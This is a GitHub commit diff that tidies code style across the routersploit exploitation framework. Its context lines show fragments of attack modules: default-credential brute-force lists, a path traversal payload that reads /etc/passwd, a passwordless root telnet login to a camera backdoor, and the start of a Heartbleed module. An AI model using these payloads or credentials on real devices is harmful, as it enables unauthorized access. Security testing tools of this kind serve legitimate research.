Skip to content

R
routersploit
Unverified Commit 62b83fb4 by Marcin Bury Committed by GitHub
Options

Improving code quality (#435)

parent 2ee21d01
Showing with 449 additions and 457 deletions
routersploit/core/bluetooth/btle/__init__.py
......@@ -5,3 +5,10 @@ from .btle_scanner import (
BTLEScanner,
ScanDelegate
)
__all__ = [
"Device",
"BTLEScanner",
"ScanDelegate",
]
routersploit/core/bluetooth/btle/btle_device.py
......@@ -120,7 +120,7 @@ class Device(ScanEntry):
for _, c in enumerate(service.getCharacteristics()):
if str(c.uuid) == characteristic:
char =c
char = c
break
if char:
......@@ -221,7 +221,7 @@ class Device(ScanEntry):
try:
string = color_blue(repr(data.decode("utf-8")))
except Exception:
stirng = repr(data)
string = repr(data)
except Exception:
pass
......
routersploit/core/bluetooth/btle/btle_scanner.py
......@@ -13,7 +13,7 @@ class BTLEScanner(Scanner):
def _decode_address(self, resp):
addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8")
return ":".join([addr[i : i + 2] for i in range(0, 12, 2)])
return ":".join([addr[i: i + 2] for i in range(0, 12, 2)])
def _find_or_create(self, addr):
if addr in self.scanned:
......@@ -59,6 +59,7 @@ class BTLEScanner(Scanner):
if self.mac and dev.addr == self.mac:
break
class ScanDelegate(DefaultDelegate):
def __init__(self, options):
DefaultDelegate.__init__(self)
......
routersploit/core/exploit/__init__.py
......@@ -24,5 +24,28 @@ from routersploit.core.exploit.printer import (
print_table,
)
import routersploit.core.exploit.utils
from routersploit.core.exploit import utils
from routersploit.core.exploit.shell import shell
__all__ = [
"Exploit",
"multi",
"mute",
"LockedIterator",
"OptIP",
"OptPort",
"OptInteger",
"OptFloat",
"OptBool",
"OptString",
"OptMAC",
"OptWordlist",
"print_info",
"print_status",
"print_success",
"print_error",
"print_table",
"utils",
"shell",
]
routersploit/core/exploit/exploit.py
import os
import threading
import time
import concurrent.futures
from future.utils import with_metaclass, iteritems
from itertools import chain
from functools import wraps
from routersploit.core.exploit.printer import (
print_status,
print_error,
thread_output_stream,
)
from routersploit.core.exploit.option import Option
......@@ -66,7 +64,6 @@ class Exploit(BaseExploit):
target_protocol = "custom"
def run(self):
raise NotImplementedError("You have to define your own 'run' method.")
......@@ -131,7 +128,7 @@ def multi(fn):
for target in file_handler:
target = target.strip()
if not target:
continue
continue
self.target, _, port = target.partition(":")
if port:
......@@ -204,5 +201,3 @@ class Protocol:
HTTP = "http"
HTTPS = "https"
SNMP = "snmp"
routersploit/core/exploit/option.py
......@@ -21,7 +21,7 @@ class Option(object):
def __get__(self, instance, owner):
return self.value
def __set__(self, instance, value):
if self._apply_widget(value):
self.display_value = value
......@@ -57,7 +57,7 @@ class OptPort(Option):
def __get__(self, instance, owner):
return int(self.value)
class OptBool(Option):
""" Option Bool attribute """
......
routersploit/core/exploit/utils.py
......@@ -16,7 +16,7 @@ WORDLISTS_DIR = wordlists.__path__[0]
def random_text(length, alph=string.ascii_letters + string.digits):
return ''.join(random.choice(alph) for _ in range(length))
return ''.join(random.choice(alph) for _ in range(length))
def is_ipv4(address):
......@@ -58,7 +58,7 @@ def convert_port(port):
def index_modules(modules_directory=MODULES_DIR):
""" Returns list of all exploits modules """
modules = []
for root, dirs, files in os.walk(modules_directory):
_, package, root = root.rpartition("routersploit/modules/".replace("/", os.sep))
......@@ -180,7 +180,7 @@ def lookup_vendor(addr):
if line == "" or line[0] == "#":
continue
mac, name = line.split(" ", 1)
mac, name = line.split(" ", 1)
if addr.startswith(mac):
return name
......@@ -249,7 +249,7 @@ class Version(object):
i += 1
return 0
return 0
def detect_file_content(content, f="/etc/passwd"):
......
routersploit/core/ftp/ftp_client.py
......@@ -55,7 +55,7 @@ class FTPClient(Exploit):
ftp_client.close()
return None
def ftp_test_connect(self):
ftp_client = self.ftp_connect()
if ftp_client:
......
routersploit/core/http/http_client.py
......@@ -21,7 +21,6 @@ class HTTPClient(Exploit):
verbosity = OptBool("true", "Verbosity enabled: true/false")
ssl = OptBool("false", "SSL enabled: true/false")
def http_request(self, method, path, session=requests, **kwargs):
if self.ssl:
url = "https://"
......
routersploit/core/snmp/snmp_client.py
......@@ -13,7 +13,7 @@ SNMP_TIMEOUT = 15.0
class SNMPClient(Exploit):
""" SNMP Client exploit """
target_protocol = Protocol.SNMP
target_protocol = Protocol.SNMP
verbosity = OptBool("true", "Enable verbose output: true/false")
......
routersploit/core/ssh/ssh_client.py
......@@ -4,7 +4,7 @@ import os
import select
import sys
import threading
import io
import io
from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
......@@ -47,7 +47,7 @@ class SSHClient(Exploit):
return ssh_client
ssh_client.close()
return
def ssh_login_pkey(self, username, priv_key, retries=1):
......@@ -126,7 +126,7 @@ class SSHClient(Exploit):
self._posix_shell(chan)
else:
self._windows_shell(chan)
def _posix_shell(self, chan):
import termios
import tty
......@@ -156,7 +156,7 @@ class SSHClient(Exploit):
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin,termios.TCSADRAIN, oldtty)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
return
def _windows_shell(self, chan):
......
routersploit/core/tcp/tcp_client.py
......@@ -14,7 +14,7 @@ TCP_SOCKET_TIMEOUT = 8.0
class TCPClient(Exploit):
""" TCP Client exploit """
target_protocol = Protocol.TCP
target_protocol = Protocol.TCP
def tcp_create(self):
if is_ipv4(self.target):
......
routersploit/core/telnet/telnet_client.py
......@@ -13,7 +13,7 @@ TELNET_TIMEOUT = 30.0
class TelnetClient(Exploit):
""" Telnet Client exploit """
target_protocol = Protocol.TELNET
target_protocol = Protocol.TELNET
verbosity = OptBool("true", "Enable verbose output: true/false")
......@@ -79,11 +79,11 @@ class TelnetClient(Exploit):
def telnet_read_until(self, telnet_client, data):
if telnet_client:
if type(data) is str:
data = bytes(data, "utf-8")
data = bytes(data, "utf-8")
response = telnet_client.read_until(data, 5)
return str(response, "utf-8")
return None
def telnet_write(self, telnet_client, data):
......
routersploit/core/udp/udp_client.py
......@@ -13,7 +13,7 @@ UDP_SOCKET_TIMEOUT = 8.0
class UDPClient(Exploit):
""" UDP Client exploit """
target_protocol = Protocol.UDP
target_protocol = Protocol.UDP
def udp_create(self):
if is_ipv4(self.target):
......
routersploit/interpreter.py
......@@ -66,7 +66,7 @@ class BaseInterpreter(object):
atexit.register(readline.write_history_file, self.history_file)
readline.parse_and_bind("set enable-keypad on")
readline.set_completer(self.complete)
readline.set_completer_delims(" \t\n;")
if is_libedit():
......@@ -333,7 +333,7 @@ class RoutersploitInterpreter(BaseInterpreter):
except KeyboardInterrupt:
print_info()
print_error("Operation cancelled by user")
except:
except Exception:
print_error(traceback.format_exc(sys.exc_info()))
def command_exploit(self, *args, **kwargs):
......
routersploit/libs/apiros/apiros_client.py
import sys
import time
import binascii
import hashlib
class ApiRosClient(object):
"Routeros api"
"RouterOS API"
def __init__(self, sk):
self.sk = sk
self.currenttag = 0
def login(self, username, pwd):
for repl, attrs in self.talk(["/login"]):
chal = binascii.unhexlify((attrs['=ret']).encode('UTF-8'))
......@@ -17,16 +17,21 @@ class ApiRosClient(object):
md.update(b'\x00')
md.update(pwd.encode('UTF-8'))
md.update(chal)
output = self.talk(["/login", "=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8') ])
output = self.talk([
"/login",
"=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8')
])
return output
def talk(self, words):
if self.writeSentence(words) == 0: return
if self.writeSentence(words) == 0:
return
r = []
while 1:
i = self.readSentence();
if len(i) == 0: continue
i = self.readSentence()
if len(i) == 0:
continue
reply = i[0]
attrs = {}
for w in i[1:]:
......@@ -34,9 +39,10 @@ class ApiRosClient(object):
if (j == -1):
attrs[w] = ''
else:
attrs[w[:j]] = w[j+1:]
attrs[w[: j]] = w[j + 1:]
r.append((reply, attrs))
if reply == '!done': return r
if reply == '!done':
return r
def writeSentence(self, words):
ret = 0
......@@ -50,9 +56,10 @@ class ApiRosClient(object):
r = []
while 1:
w = self.readWord()
if w == '': return r
if w == '':
return r
r.append(w)
def writeWord(self, w):
self.writeLen(len(w))
self.writeStr(w)
......@@ -61,83 +68,85 @@ class ApiRosClient(object):
ret = self.readStr(self.readLen())
return ret
def writeLen(self, l):
if l < 0x80:
self.writeByte((l).to_bytes(1, sys.byteorder))
elif l < 0x4000:
l |= 0x8000
tmp = (l >> 8) & 0xFF
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
elif l < 0x200000:
l |= 0xC00000
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
elif l < 0x10000000:
l |= 0xE0000000
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
else:
def writeLen(self, length):
if length < 0x80:
self.writeByte((length).to_bytes(1, sys.byteorder))
elif length < 0x4000:
length |= 0x8000
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x200000:
length |= 0xC00000
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x10000000:
length |= 0xE0000000
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
else:
self.writeByte((0xF0).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
def readLen(self):
c = ord(self.readStr(1))
if (c & 0x80) == 0x00:
pass
elif (c & 0xC0) == 0x80:
c &= ~0xC0
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xE0) == 0xC0:
c &= ~0xE0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF0) == 0xE0:
c &= ~0xF0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF8) == 0xF0:
c = ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
return c
def readLen(self):
c = ord(self.readStr(1))
if (c & 0x80) == 0x00:
pass
elif (c & 0xC0) == 0x80:
c &= ~0xC0
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xE0) == 0xC0:
c &= ~0xE0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF0) == 0xE0:
c &= ~0xF0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF8) == 0xF0:
c = ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
return c
def writeStr(self, str):
n = 0;
def writeStr(self, str):
n = 0
while n < len(str):
r = self.sk.send(bytes(str[n:], 'UTF-8'))
if r == 0: raise RuntimeError("connection closed by remote end")
n += r
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def writeByte(self, str):
n = 0;
def writeByte(self, str):
n = 0
while n < len(str):
r = self.sk.send(str[n:])
if r == 0: raise RuntimeError("connection closed by remote end")
n += r
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def readStr(self, length):
def readStr(self, length):
ret = ''
while len(ret) < length:
s = self.sk.recv(length - len(ret))
if s == '': raise RuntimeError("connection closed by remote end")
if s == '':
raise RuntimeError("connection closed by remote end")
ret += s.decode('UTF-8', 'replace')
return ret
routersploit/libs/lzs/lzs.py
......@@ -20,7 +20,6 @@
#
##############################################################
import sys
import collections
......
routersploit/modules/creds/cameras/basler/ssh_default_creds.py
......@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
class Exploit(SSHDefault):
__info__ = {
"name": "Basler Camera Default SSH Creds",
"description": "Module performs dictionary attack against Basler Camera SSH service. "
......
routersploit/modules/creds/cameras/canon/ssh_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(SSHDefault):
__info__ = {
"name": "Canon Camera Default SSH Creds",
"description": "Module performs dictionary attack against Canon Camera SSH service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/canon/webinterface_http_auth_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(HTTPBasicDigestDefault):
__info__ = {
"name": "Canon Camera Default Web Interface Creds - HTTP Auth",
"description": "Module performs dictionary attack against Canon Camera Web Interface. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/cisco/ftp_default_creds.py
......@@ -19,5 +19,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/dlink/ssh_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/geovision/ftp_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/mobotix/ftp_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(FTPDefault):
__info__ = {
"name": "Mobotix Camera Default FTP Creds",
"description": "Module performs dictionary attack against Mobotix Camera FTP service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/mobotix/ssh_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(SSHDefault):
__info__ = {
"name": "Mobotix Camera Default SSH Creds",
"description": "Module performs dictionary attack against Mobotix Camera SSH service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/siemens/ssh_default_creds.py
......@@ -18,5 +18,5 @@ class Exploit(SSHDefault):
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(22, "Target SSH port")
threads = OptInteger(1, "Number of threads")
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/speco/ssh_default_creds.py
......@@ -18,5 +18,5 @@ class Exploit(SSHDefault):
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(22, "Target SSH port")
threads = OptInteger(1, "Number of threads")
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/vacron/ftp_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(FTPDefault):
__info__ = {
"name": "Vacron Camera Default FTP Creds",
"description": "Module performs dictionary attack against Vacron Camera FTP service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/videoiq/ftp_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("supervisor:supervisor", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/videoiq/ssh_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
default = OptWordlist("supervistor:supervisor", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/generic/ftp_default.py
from routersploit.core.exploit import *
from routersploit.core.ftp.ftp_client import FTPClient
from routersploit.resources import wordlists
from routersploit.resources import wordlists
class Exploit(FTPClient):
......@@ -37,7 +37,7 @@ class Exploit(FTPClient):
print_status("Starting attack against FTP service")
data = LockedIterator(self.defaults)
self.run_threads(self.threads, self.target_function, data)
self.run_threads(self.threads, self.target_function, data)
if self.credentials:
print_success("Credentials found!")
......@@ -49,7 +49,7 @@ class Exploit(FTPClient):
def target_function(self, running, data):
while running.is_set():
try:
username, password = data.next().split(":")
username, password = data.next().split(":")
except StopIteration:
break
else:
......
routersploit/modules/creds/generic/http_basic_digest_bruteforce.py
import itertools
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.resources import wordlists
from routersploit.resources import wordlists
from requests.auth import HTTPDigestAuth
......
routersploit/modules/creds/generic/http_basic_digest_default.py
......@@ -57,7 +57,7 @@ class Exploit(HTTPClient):
while running.is_set():
try:
username, password = data.next().split(":")
if self.auth_type == "digest":
auth = HTTPDigestAuth(username, password)
else:
......
routersploit/modules/creds/generic/snmp_bruteforce.py
......@@ -58,7 +58,7 @@ class Exploit(SNMPClient):
except StopIteration:
break
def check(self):
raise NotImplementedError("Check method is not available")
......
routersploit/modules/creds/generic/ssh_default.py
......@@ -48,7 +48,7 @@ class Exploit(SSHClient):
print_error("Credentials not found")
def target_function(self, running, data):
while running.is_set():
while running.is_set():
try:
username, password = data.next().split(":")
ssh = self.ssh_login(username, password)
......
routersploit/modules/creds/generic/telnet_bruteforce.py
......@@ -37,7 +37,7 @@ class Exploit(TelnetClient):
if not self.check():
return
print_status("Starting bruteforce attack against Telnet service")
print_status("Starting bruteforce attack against Telnet service")
data = LockedIterator(itertools.product(self.usernames, self.passwords))
self.run_threads(self.threads, self.target_function, data)
......
routersploit/modules/creds/generic/telnet_default.py
......@@ -35,7 +35,7 @@ class Exploit(TelnetClient):
if not self.check():
return
print_status("Starting default credentials attack against Telnet service")
print_status("Starting default credentials attack against Telnet service")
data = LockedIterator(self.defaults)
self.run_threads(self.threads, self.target_function, data)
......
routersploit/modules/creds/routers/asmax/telnet_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(TelnetDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/routers/belkin/ftp_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/routers/fortinet/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/huawei/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/ipfire/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/ipfire/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......@@ -15,7 +15,6 @@ class Exploit(TelnetDefault):
),
}
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(23, "Target Telnet port")
......
routersploit/modules/creds/routers/juniper/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py
......@@ -7,7 +7,7 @@ class Exploit(TCPClient):
__info__ = {
"name": "Mikrotik Default Creds - API ROS",
"description": "",
"authors": (
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"devices": (
......@@ -64,7 +64,7 @@ class Exploit(TCPClient):
print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
tcp_client.close()
except StopIteration:
break
......
routersploit/modules/creds/routers/movistar/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/netcore/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/netcore/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/netgear/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/netgear/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/netsys/ftp_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(FTPDefault):
__info__ = {
"name": "Netsys Router Default FTP Creds",
"description": "Module performs dictionary attack against Netsys Router FTP service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/routers/netsys/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
__info__ = {
"name": "Netsys Router Default SSH Creds",
"description": "Module performs dictionary attack against Netsys Router SSH service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/routers/netsys/telnet_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(FTPDefault):
__info__ = {
"name": "Netsys Router Default Telnet Creds",
"description": "Module performs dictionary attack against Netsys Router Telnet service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/routers/pfsense/webinterface_http_form_default_creds.py
import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......@@ -48,7 +47,6 @@ class Exploit(HTTPClient):
def target_function(self, data):
username, password = data.split(":")
def check(self):
response = self.http_request(
method="GET",
......@@ -57,9 +55,7 @@ class Exploit(HTTPClient):
if response is None:
return False
if all([x in response.text
for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>',
'var csrfMagicToken =']]):
if all([x in response.text for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>', 'var csrfMagicToken =']]):
return True
return False
......
routersploit/modules/creds/routers/technicolor/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/technicolor/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/thomson/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/tplink/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/tplink/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/ubiquiti/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,root:ubnt,ubnt:ubnt", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/routers/ubiquiti/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/zte/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/zte/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/zyxel/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/zyxel/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py
......@@ -26,10 +26,9 @@ class Exploit(HTTPClient):
port = OptPort(8080, "Target HTTP port")
def __init__(self):
config_content = None
self.config_content = None
def run(self):
if self.check():
print_success("Target appears to be vulnerable.")
......@@ -115,4 +114,3 @@ class Exploit(HTTPClient):
ret_str += tmp_str[i + half_str_len] + tmp_str[i]
return ret_str
routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py
......@@ -42,8 +42,7 @@ class Exploit(TelnetClient):
print_success("SQLI successful, going to telnet into port 20000 "
"with username root and no password to get shell")
tn = self.telnet_login("root", "", port=20000)
tn = self.telnet_login("root", "", port=20000)
if tn:
self.telnet_interactive(tn)
......
routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py
import requests
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......
routersploit/modules/exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py
......@@ -26,7 +26,7 @@ class Exploit(HTTPClient):
port = OptPort(80, "Target HTTP port")
filename = OptString("/etc/passwd", "File to read from the filesystem")
def __init__(self):
self.resources = (
"/cgi-bin/check.cgi?file=../../..{}",
......
routersploit/modules/exploits/cameras/multi/netwave_ip_camera_information_disclosure.py
......@@ -59,7 +59,7 @@ class Exploit(HTTPClient):
for chunk in response.iter_content(chunk_size=100):
if "admin" in chunk:
print_success(chunk)
except:
except Exception:
print_error("Exploit failed - could not read /proc/kcore")
@mute
......
routersploit/modules/exploits/generic/heartbleed.py
......@@ -55,67 +55,67 @@ class Exploit(TCPClient):
heartbeat_length = OptInteger(65535, "Heartbeat length")
CIPHER_SUITS = (
0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
